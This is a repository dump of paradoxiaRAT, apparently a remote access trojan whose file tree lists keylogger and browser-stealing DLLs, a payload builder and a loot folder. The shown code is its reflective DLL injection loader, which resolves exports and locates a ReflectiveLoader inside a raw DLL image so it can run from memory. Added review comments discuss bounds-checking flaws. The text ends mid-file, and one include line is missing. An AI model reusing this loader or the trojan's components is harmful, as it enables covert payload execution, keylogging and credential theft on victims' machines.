├── .gitignore ├── GeoLite2-City.mmdb ├── LICENSE ├── ParadoxiaClient ├── ParadoxiaClient.sln └── ParadoxiaClient │ ├── GetProcAddressR.c │ ├── GetProcAddressR.h │ ├── LoadLibraryR.c │ ├── LoadLibraryR.h │ ├── ParadoxiaClient.c │ ├── ParadoxiaClient.vcxproj │ ├── ParadoxiaClient.vcxproj.filters │ ├── ReflectiveDLLInjection.h │ ├── icon.rc │ ├── main.c │ ├── makefile │ ├── paradoxia.c │ ├── paradoxia.h │ └── sys.c ├── README.md ├── blacklist ├── dlls ├── chrome.dll ├── keylogger.dll └── readme.md ├── images ├── logo.png ├── pd1.PNG ├── pd2.PNG ├── pd3.PNG ├── pd4.PNG ├── pd5.PNG ├── pd6.PNG ├── pd7.PNG ├── pd8.PNG └── pdmiss.PNG ├── install.sh ├── kernel ├── __init__.py ├── banner.py ├── builder.py ├── main.py ├── other.py └── scanner.py ├── loot └── README.md ├── paradoxia.ini ├── paradoxia.py └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | # Sometimes a file finds a way to slip through and make it through repo... 2 | 3 | .vscode/* 4 | .vs/* 5 | *.exe 6 | *.pyc 7 | *.d 8 | *.o 9 | *.dll 10 | output.png 11 | passwords.txt 12 | downloads/* 13 | *.bmp 14 | *.jpg 15 | *.jpeg 16 | *.wav 17 | test.c 18 | test.cpp 19 | ## Ignore Visual Studio temporary files, build results, and 20 | ## files generated by popular Visual Studio add-ons. 
21 | ## 22 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 23 | 24 | # User-specific files 25 | *.rsuser 26 | *.suo 27 | *.user 28 | *.userosscache 29 | *.sln.docstates 30 | 31 | # User-specific files (MonoDevelop/Xamarin Studio) 32 | *.userprefs 33 | 34 | # Mono auto generated files 35 | mono_crash.* 36 | 37 | # Build results 38 | [Dd]ebug/ 39 | [Dd]ebugPublic/ 40 | [Rr]elease/ 41 | [Rr]eleases/ 42 | x64/ 43 | x86/ 44 | [Ww][Ii][Nn]32/ 45 | [Aa][Rr][Mm]/ 46 | [Aa][Rr][Mm]64/ 47 | bld/ 48 | [Bb]in/ 49 | [Oo]bj/ 50 | [Ll]og/ 51 | [Ll]ogs/ 52 | 53 | # Visual Studio 2015/2017 cache/options directory 54 | .vs/ 55 | # Uncomment if you have tasks that create the project's static files in wwwroot 56 | #wwwroot/ 57 | 58 | # Visual Studio 2017 auto generated files 59 | Generated\ Files/ 60 | 61 | # MSTest test Results 62 | [Tt]est[Rr]esult*/ 63 | [Bb]uild[Ll]og.* 64 | 65 | # NUnit 66 | *.VisualState.xml 67 | TestResult.xml 68 | nunit-*.xml 69 | 70 | # Build Results of an ATL Project 71 | [Dd]ebugPS/ 72 | [Rr]eleasePS/ 73 | dlldata.c 74 | 75 | # Benchmark Results 76 | BenchmarkDotNet.Artifacts/ 77 | 78 | # .NET Core 79 | project.lock.json 80 | project.fragment.lock.json 81 | artifacts/ 82 | 83 | # ASP.NET Scaffolding 84 | ScaffoldingReadMe.txt 85 | 86 | # StyleCop 87 | StyleCopReport.xml 88 | 89 | # Files built by Visual Studio 90 | *_i.c 91 | *_p.c 92 | *_h.h 93 | *.ilk 94 | *.meta 95 | *.obj 96 | *.iobj 97 | *.pch 98 | *.pdb 99 | *.ipdb 100 | *.pgc 101 | *.pgd 102 | *.rsp 103 | *.sbr 104 | *.tlb 105 | *.tli 106 | *.tlh 107 | *.tmp 108 | *.tmp_proj 109 | *_wpftmp.csproj 110 | *.log 111 | *.vspscc 112 | *.vssscc 113 | .builds 114 | *.pidb 115 | *.svclog 116 | *.scc 117 | 118 | # Chutzpah Test files 119 | _Chutzpah* 120 | 121 | # Visual C++ cache files 122 | ipch/ 123 | *.aps 124 | *.ncb 125 | *.opendb 126 | *.opensdf 127 | *.sdf 128 | *.cachefile 129 | *.VC.db 130 | *.VC.VC.opendb 131 | 132 | # Visual Studio profiler 133 | *.psess 
134 | *.vsp 135 | *.vspx 136 | *.sap 137 | 138 | # Visual Studio Trace Files 139 | *.e2e 140 | 141 | # TFS 2012 Local Workspace 142 | $tf/ 143 | 144 | # Guidance Automation Toolkit 145 | *.gpState 146 | 147 | # ReSharper is a .NET coding add-in 148 | _ReSharper*/ 149 | *.[Rr]e[Ss]harper 150 | *.DotSettings.user 151 | 152 | # TeamCity is a build add-in 153 | _TeamCity* 154 | 155 | # DotCover is a Code Coverage Tool 156 | *.dotCover 157 | 158 | # AxoCover is a Code Coverage Tool 159 | .axoCover/* 160 | !.axoCover/settings.json 161 | 162 | # Coverlet is a free, cross platform Code Coverage Tool 163 | coverage*.json 164 | coverage*.xml 165 | coverage*.info 166 | 167 | # Visual Studio code coverage results 168 | *.coverage 169 | *.coveragexml 170 | 171 | # NCrunch 172 | _NCrunch_* 173 | .*crunch*.local.xml 174 | nCrunchTemp_* 175 | 176 | # MightyMoose 177 | *.mm.* 178 | AutoTest.Net/ 179 | 180 | # Web workbench (sass) 181 | .sass-cache/ 182 | 183 | # Installshield output folder 184 | [Ee]xpress/ 185 | 186 | # DocProject is a documentation generator add-in 187 | DocProject/buildhelp/ 188 | DocProject/Help/*.HxT 189 | DocProject/Help/*.HxC 190 | DocProject/Help/*.hhc 191 | DocProject/Help/*.hhk 192 | DocProject/Help/*.hhp 193 | DocProject/Help/Html2 194 | DocProject/Help/html 195 | 196 | # Click-Once directory 197 | publish/ 198 | 199 | # Publish Web Output 200 | *.[Pp]ublish.xml 201 | *.azurePubxml 202 | # Note: Comment the next line if you want to checkin your web deploy settings, 203 | # but database connection strings (with potential passwords) will be unencrypted 204 | *.pubxml 205 | *.publishproj 206 | 207 | # Microsoft Azure Web App publish settings. 
Comment the next line if you want to 208 | # checkin your Azure Web App publish settings, but sensitive information contained 209 | # in these scripts will be unencrypted 210 | PublishScripts/ 211 | 212 | # NuGet Packages 213 | *.nupkg 214 | # NuGet Symbol Packages 215 | *.snupkg 216 | # The packages folder can be ignored because of Package Restore 217 | **/[Pp]ackages/* 218 | # except build/, which is used as an MSBuild target. 219 | !**/[Pp]ackages/build/ 220 | # Uncomment if necessary however generally it will be regenerated when needed 221 | #!**/[Pp]ackages/repositories.config 222 | # NuGet v3's project.json files produces more ignorable files 223 | *.nuget.props 224 | *.nuget.targets 225 | 226 | # Microsoft Azure Build Output 227 | csx/ 228 | *.build.csdef 229 | 230 | # Microsoft Azure Emulator 231 | ecf/ 232 | rcf/ 233 | 234 | # Windows Store app package directories and files 235 | AppPackages/ 236 | BundleArtifacts/ 237 | Package.StoreAssociation.xml 238 | _pkginfo.txt 239 | *.appx 240 | *.appxbundle 241 | *.appxupload 242 | 243 | # Visual Studio cache files 244 | # files ending in .cache can be ignored 245 | *.[Cc]ache 246 | # but keep track of directories ending in .cache 247 | !?*.[Cc]ache/ 248 | 249 | # Others 250 | ClientBin/ 251 | ~$* 252 | *~ 253 | *.dbmdl 254 | *.dbproj.schemaview 255 | *.jfm 256 | *.pfx 257 | *.publishsettings 258 | orleans.codegen.cs 259 | 260 | # Including strong name files can present a security risk 261 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 262 | #*.snk 263 | 264 | # Since there are multiple workflows, uncomment next line to ignore bower_components 265 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 266 | #bower_components/ 267 | 268 | # RIA/Silverlight projects 269 | Generated_Code/ 270 | 271 | # Backup & report files from converting an old project file 272 | # to a newer Visual Studio version. 
Backup files are not needed, 273 | # because we have git ;-) 274 | _UpgradeReport_Files/ 275 | Backup*/ 276 | UpgradeLog*.XML 277 | UpgradeLog*.htm 278 | ServiceFabricBackup/ 279 | *.rptproj.bak 280 | 281 | # SQL Server files 282 | *.mdf 283 | *.ldf 284 | *.ndf 285 | 286 | # Business Intelligence projects 287 | *.rdl.data 288 | *.bim.layout 289 | *.bim_*.settings 290 | *.rptproj.rsuser 291 | *- [Bb]ackup.rdl 292 | *- [Bb]ackup ([0-9]).rdl 293 | *- [Bb]ackup ([0-9][0-9]).rdl 294 | 295 | # Microsoft Fakes 296 | FakesAssemblies/ 297 | 298 | # GhostDoc plugin setting file 299 | *.GhostDoc.xml 300 | 301 | # Node.js Tools for Visual Studio 302 | .ntvs_analysis.dat 303 | node_modules/ 304 | 305 | # Visual Studio 6 build log 306 | *.plg 307 | 308 | # Visual Studio 6 workspace options file 309 | *.opt 310 | 311 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 312 | *.vbw 313 | 314 | # Visual Studio LightSwitch build output 315 | **/*.HTMLClient/GeneratedArtifacts 316 | **/*.DesktopClient/GeneratedArtifacts 317 | **/*.DesktopClient/ModelManifest.xml 318 | **/*.Server/GeneratedArtifacts 319 | **/*.Server/ModelManifest.xml 320 | _Pvt_Extensions 321 | 322 | # Paket dependency manager 323 | .paket/paket.exe 324 | paket-files/ 325 | 326 | # FAKE - F# Make 327 | .fake/ 328 | 329 | # CodeRush personal settings 330 | .cr/personal 331 | 332 | # Python Tools for Visual Studio (PTVS) 333 | __pycache__/ 334 | *.pyc 335 | 336 | # Cake - Uncomment if you are using it 337 | # tools/** 338 | # !tools/packages.config 339 | 340 | # Tabs Studio 341 | *.tss 342 | 343 | # Telerik's JustMock configuration file 344 | *.jmconfig 345 | 346 | # BizTalk build output 347 | *.btp.cs 348 | *.btm.cs 349 | *.odx.cs 350 | *.xsd.cs 351 | 352 | # OpenCover UI analysis results 353 | OpenCover/ 354 | 355 | # Azure Stream Analytics local run output 356 | ASALocalRun/ 357 | 358 | # MSBuild Binary and Structured Log 359 | *.binlog 360 | 361 | # NVidia Nsight GPU debugger 
configuration file 362 | *.nvuser 363 | 364 | # MFractors (Xamarin productivity tool) working folder 365 | .mfractor/ 366 | 367 | # Local History for Visual Studio 368 | .localhistory/ 369 | 370 | # BeatPulse healthcheck temp database 371 | healthchecksdb 372 | 373 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 374 | MigrationBackup/ 375 | 376 | # Ionide (cross platform F# VS Code tools) working folder 377 | .ionide/ 378 | 379 | # Fody - auto-generated XML schema 380 | FodyWeavers.xsd -------------------------------------------------------------------------------- /GeoLite2-City.mmdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/GeoLite2-City.mmdb -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 QuantumCored 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30523.141 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ParadoxiaClient", "ParadoxiaClient\ParadoxiaClient.vcxproj", "{BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Debug|x64.ActiveCfg = Debug|x64 17 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Debug|x64.Build.0 = Debug|x64 18 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Debug|x86.ActiveCfg = Debug|Win32 19 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Debug|x86.Build.0 = Debug|Win32 20 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Release|x64.ActiveCfg = Release|x64 21 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Release|x64.Build.0 = Release|x64 22 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Release|x86.ActiveCfg = Release|Win32 23 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {20FDEB1B-2065-4F66-9C09-ABB1D374A7B0} 30 | 
EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/GetProcAddressR.c: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
// IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "GetProcAddressR.h"
//===============================================================================================//
// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
// wont be able to resolve exported addresses in reflectivly loaded librarys.
//
// Resolve an export of an in-memory PE image by walking its export directory by hand.
//   hModule    - base address of the image; it is used as a raw pointer and never validated.
//   lpProcName - export name, or an ordinal carried in the low 16 bits of the pointer value
//                (the same convention kernel32!GetProcAddress uses).
// Returns the export's VA, or NULL when hModule is NULL, the name is not present, or an access
// violation is raised while walking the headers (swallowed by the __try/__except below).
//
// NOTE(review): nothing in this walk is bounds-checked against the image size - e_lfanew, the
// export directory RVA, NumberOfNames and the ordinal index are all trusted. A malformed or
// hostile image is contained only by the SEH handler, and GetProcAddressR.h defines __try/__except
// away under __MINGW32__, so MinGW builds have no containment at all.
// NOTE(review): forwarded exports are not detected; if the image uses forwarders the value
// returned would point at the forwarder string rather than at code.
FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
{
	UINT_PTR uiLibraryAddress = 0;
	FARPROC fpResult = NULL;

	if( hModule == NULL )
		return NULL;

	// a module handle is really its base address
	uiLibraryAddress = (UINT_PTR)hModule;

	__try
	{
		UINT_PTR uiAddressArray = 0;
		UINT_PTR uiNameArray = 0;
		UINT_PTR uiNameOrdinals = 0;
		PIMAGE_NT_HEADERS pNtHeaders = NULL;
		PIMAGE_DATA_DIRECTORY pDataDirectory = NULL;
		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;

		// get the VA of the modules NT Header
		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);

		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];

		// get the VA of the export directory
		// (no check that the directory exists - a zero VirtualAddress makes this alias the DOS header)
		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );

		// get the VA for the array of addresses
		uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );

		// get the VA for the array of name pointers
		uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );

		// get the VA for the array of name ordinals
		uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );

		// test if we are importing by name or by ordinal...
		// NOTE(review): on 64-bit builds the (DWORD) cast truncates the pointer before the test, so
		// a genuine name pointer whose low 32 bits happen to be below 0x10000 is misread as an
		// ordinal. Testing ((ULONG_PTR)lpProcName >> 16) == 0 avoids the truncation.
		if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
		{
			// import by ordinal...

			// use the import ordinal (- export ordinal base) as an index into the array of addresses
			// NOTE(review): the ordinal is not range-checked against NumberOfFunctions; an
			// out-of-range ordinal indexes past AddressOfFunctions and yields a garbage pointer.
			uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );

			// resolve the address for this imported function
			fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
		}
		else
		{
			// import by name...
			// Linear scan over the name table; the first exact strcmp match wins.
			DWORD dwCounter = pExportDirectory->NumberOfNames;
			while( dwCounter-- )
			{
				char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));

				// test if we have a match...
				if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
				{
					// use the functions name ordinal as an index into the array of name pointers
					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );

					// calculate the virtual address for the function
					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));

					// finish...
					break;
				}

				// get the next exported function name
				uiNameArray += sizeof(DWORD);

				// get the next exported function name ordinal
				uiNameOrdinals += sizeof(WORD);
			}
		}
	}
	__except( EXCEPTION_EXECUTE_HANDLER )
	{
		// any fault while dereferencing the (untrusted) headers is reported as "not found"
		fpResult = NULL;
	}

	return fpResult;
}
//===============================================================================================//
--------------------------------------------------------------------------------
/ParadoxiaClient/ParadoxiaClient/GetProcAddressR.h:
--------------------------------------------------------------------------------
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
//     * Redistributions of source code must retain the above copyright notice, this list of
//       conditions and the following disclaimer.
//
//     * Redistributions in binary form must reproduce the above copyright notice, this list of
//       conditions and the following disclaimer in the documentation and/or other materials provided
//       with the distribution.
//
//     * Neither the name of Harmony Security nor the names of its contributors may be used to
//       endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
// IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
#define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
// MinGW has no MSVC-style structured exception handling, so the keywords are compiled away:
// __try becomes an ordinary block and __except(x) becomes "if(0)", i.e. the handler body is
// dead code. Consequence: in MinGW builds GetProcAddressR has NO protection against a malformed
// image - a bad e_lfanew or export RVA is an unhandled access violation, not a NULL return.
#ifdef __MINGW32__
#define __try
#define __except(x) if(0)
#endif

// Minimal GetProcAddress for reflectively loaded images: hModule is the image base address,
// lpProcName a name or a 16-bit ordinal. Returns NULL on failure (see GetProcAddressR.c).
FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
//===============================================================================================//
#endif
//===============================================================================================//
--------------------------------------------------------------------------------
/ParadoxiaClient/ParadoxiaClient/LoadLibraryR.c:
--------------------------------------------------------------------------------
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
//===============================================================================================//
#include "LoadLibraryR.h"
// NOTE(review): the header name on the next include was lost in extraction; do not guess it.
#include
//===============================================================================================//
// Translate an RVA into a file offset within a raw (as-on-disk, not mapped) PE image that starts
// at uiBaseAddress, by finding the section whose virtual range contains it.
//   dwRva         - relative virtual address to translate.
//   uiBaseAddress - address of the first byte of the raw image in memory.
// Returns the RVA unchanged when it lies before the first section's raw data (i.e. inside the
// headers), the translated file offset when a section matches, and 0 otherwise.
//
// NOTE(review): there is no image-length parameter, so e_lfanew, SizeOfOptionalHeader and
// NumberOfSections are trusted and can steer the section-table walk outside the buffer;
// pSectionHeader[0] is read even when NumberOfSections is 0. A 0 result is indistinguishable
// from a valid header offset, and the callers below add it to the base without checking.
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
	WORD wIndex = 0;
	PIMAGE_SECTION_HEADER pSectionHeader = NULL;
	PIMAGE_NT_HEADERS pNtHeaders = NULL;

	pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);

	// section table immediately follows the optional header
	pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);

	// headers are not relocated: file offset == RVA there
	if( dwRva < pSectionHeader[0].PointerToRawData )
		return dwRva;

	for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
	{
		// SizeOfRawData (not VirtualSize) bounds the match, so RVAs in a section's
		// zero-filled tail are treated as not found
		if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
			return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
	}

	return 0;
}
//===============================================================================================//
// Find the file offset of the exported ReflectiveLoader function inside a raw DLL image.
//   lpReflectiveDllBuffer - raw image bytes (presumably whatever was received from the server;
//                           verify against the caller in ParadoxiaClient.c).
// Returns 0 if the image is not a PE of the same bitness as this build (Magic 0x010B = PE32,
// 0x020B = PE32+), or if no export name contains "ReflectiveLoader".
//
// NOTE(review): this function has no SEH of its own; both callers below wrap it in __try, which
// is a no-op under MinGW (see LoadLibraryR.h). All header fields are trusted - see Rva2Offset.
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
	UINT_PTR uiBaseAddress = 0;
	UINT_PTR uiExportDir = 0;
	UINT_PTR uiNameArray = 0;
	UINT_PTR uiAddressArray = 0;
	UINT_PTR uiNameOrdinals = 0;
	DWORD dwCounter = 0;
#ifdef WIN_X64
	DWORD dwCompiledArch = 2;
#else
	// This will catch Win32 and WinRT.
	DWORD dwCompiledArch = 1;
#endif

	uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;

	// get the File Offset of the modules NT Header
	uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;

	// currenlty we can only process a PE file which is the same type as the one this fuction has
	// been compiled as, due to various offset in the PE structures being defined at compile time.
	if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
	{
		if( dwCompiledArch != 1 )
			return 0;
	}
	else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
	{
		if( dwCompiledArch != 2 )
			return 0;
	}
	else
	{
		return 0;
	}

	// uiNameArray = the address of the modules export directory entry
	uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];

	// get the File Offset of the export directory
	// (a Rva2Offset miss returns 0 here, silently aliasing the DOS header as the export directory)
	uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );

	// get the File Offset for the array of name pointers
	uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );

	// get the File Offset for the array of addresses
	uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );

	// get the File Offset for the array of name ordinals
	uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );

	// get a counter for the number of exported functions...
	dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;

	// loop through all the exported functions to find the ReflectiveLoader
	while( dwCounter-- )
	{
		char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));

		// substring match, first hit wins: presumably to tolerate decorated names such as
		// "_ReflectiveLoader@4", but it also accepts any unrelated export containing the word.
		if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
		{
			// get the File Offset for the array of addresses
			uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );

			// use the functions name ordinal as an index into the array of name pointers
			uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );

			// return the File Offset to the ReflectiveLoader() functions code...
			return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
		}
		// get the next exported function name
		uiNameArray += sizeof(DWORD);

		// get the next exported function name ordinal
		uiNameOrdinals += sizeof(WORD);
	}

	return 0;
}
//===============================================================================================//
// Loads a DLL image from memory via its exported ReflectiveLoader function
//
